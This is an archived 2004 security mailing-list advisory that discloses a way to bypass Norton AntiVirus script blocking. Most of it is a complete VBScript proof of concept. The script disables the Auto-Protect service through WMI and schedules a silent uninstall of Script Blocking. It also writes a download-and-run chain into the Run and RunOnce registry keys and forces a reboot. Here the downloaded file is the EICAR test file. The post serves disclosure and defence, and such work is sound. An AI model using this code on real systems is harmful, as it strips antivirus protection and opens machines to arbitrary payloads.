[NT] Norton Anti-Virus VB Scripting Vulnerability

• Previous message: SecuriTeam: "[EXPL] Kerio Personal Firewall Multiple IP Options DoS PoC"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 17 Nov 2004 16:05:46 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Norton Anti-Virus VB Scripting Vulnerability
------------------------------------------------------------------------

SUMMARY

Presented here is a method to bypass Norton Anti-Virus Script Blocking,
and launch malicious contents undetected by the Anti-Virus.

DETAILS

The VB script presented below will run even with Norton AntiVirus Script
Blocking enabled by using WMI. The script will then disable the
Auto-Protect Service and will disable Script Blocking, allowing malicious
content to run undetected.

In a nutshell, here's what the proof of concept does:
On Reboot it sets:
1) The NAV Auto-Protect Service to DISABLED
2) A registry key to Uninstall Script Blocking
3) Creates, launches a VBScript file to d/l the EICAR AV 'test' virus
4) Launches the EICAR.COM test pattern a few seconds later
Note: This exploit works only if the user is logged in with Administrative
privileges.

A flash movie demonstrating the proof of concept can be found at:
<http://wired.s6n.com/files/jathias/navdemo.html>
http://wired.s6n.com/files/jathias/navdemo.html
You'll see that Script Blocking gets uninstalled. As well, notice that
Auto-Protect doesn't kick in until you click on the tray icon and launch
the NAV console. By then, the 'Virus' had already launched quite some time
before, as you can see in the cmd.exe window.

Proof of Concept Code:
The following code was tested under WinXP and a fully LiveUpdated NAV 2005
using a broadband Internet connection. Should be fine for Win2000 and NAV
2004 as well.

' ----- DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI -----

sServer = "."
Set oWMI = GetObject("winmgmts://.")

sServiceName = "Norton AntiVirus Auto-Protect Service"
sWQL = "Select state from Win32_Service " _
     & "Where displayname='" & sServiceName & "'"
Set oResults = oWMI.ExecQuery(sWQL)
For Each oService In oResults
    oService.StopService
    oService.ChangeStartMode("Disabled")
Next

' -------- UNINSTALL SCRIPT BLOCKING WITH WMI ;) ----------

const HKEY_LOCAL_MACHINE = &H80000002

strComputer = "."

Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Uninstall Norton Script Blocking"
arrStringValues = ("MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

' -------- CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ---------

Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Downloader"
arrStringValues = ("cmd /c ECHO Set
X=CreateObject("+chr(34)+"Microsoft.XMLHTTP"+chr(34)+"):X.open
"+chr(34)+"GET"+chr(34)+",("+chr(34)+"http://www.eicar.org/download/eicar.com"+chr(34)+"),False:X.send:set
Y=createobject("+chr(34)+"adodb.stream"+chr(34)+"):Y.type=1:Y.open:Y.write
X.responseBody:Y.savetofile("+chr(34)+"eicar.com"+chr(34)+"),2:Y.close >
estart.VBS")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

' -------- CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ----------

Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Launcer"
arrStringValues = ("cmd /c ECHO wscript.sleep(10000):Set
Z=CreateObject("+chr(34)+"WSCript.Shell"+chr(34)+"):Z.run("+chr(34)+"cmd
/k eicar.com"+chr(34)+") > elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

' -------- LAUNCH EICAR DOWNLOADER ----------

Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Code DownLoader"
arrStringValues = ("estart.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

' -------- RUN THE 'VIRUS' ----------

Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Malicious Code Launcher"
arrStringValues = ("elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

' ---- USE WMI TO FORCE A REBOOT -- NEXT LOGIN, PWN3D ----

Set wmi = GetObject("winmgmts:{(Shutdown)}")
set objset = wmi.instancesof("win32_operatingsystem")
  for each obj in objset
   set os = obj : exit for
  next
os.win32shutdown 2 + 4

ADDITIONAL INFORMATION

The information has been provided by <mailto:dmilisic@myrealbox.com>
Daniel Milisic.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[EXPL] Kerio Personal Firewall Multiple IP Options DoS PoC"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

• [VulnWatch] Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Includes PoC VBScript Code)
  ... - Norton AntiVirus 2004/2005 Script Blocking Redux ... Set objRegistry
  = ... objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, ...
  (VulnWatch)
• [Full-Disclosure] Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Includes PoC VBScript Cod
  ... - Norton AntiVirus 2004/2005 Script Blocking Redux ... Set objRegistry
  = ... objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, ...
  (Full-Disclosure)
• Re: Error 0x8007043B after XP SP2
  ... objReg.GetMultiStringValue HKLM, strKeyPath, strValueName, arrValues ... --
  torgeir, Microsoft MVP Scripting and WMI, Porsgrunn Norway Administration scripting examples and
  an ONLINE version of the 1328 page Scripting Guide: ... (microsoft.public.windowsupdate)
• Re: Modify Registry
  ... Dim ComputerName ... strValueName = "AutoAdminLogon" ... Return
  = objReg.CreateKey(HKEY_LOCAL_MACHINE, strKeyPath) ... (microsoft.public.scripting.wsh)
• Why GetStringValue return NULL?
  ... Here is code snippet digest from "The Portable Script Center", ... strKeyPath
  = "Console" ... strValueName = "HistoryBufferSize" ... it can't output string
  value. ... (microsoft.public.scripting.vbscript)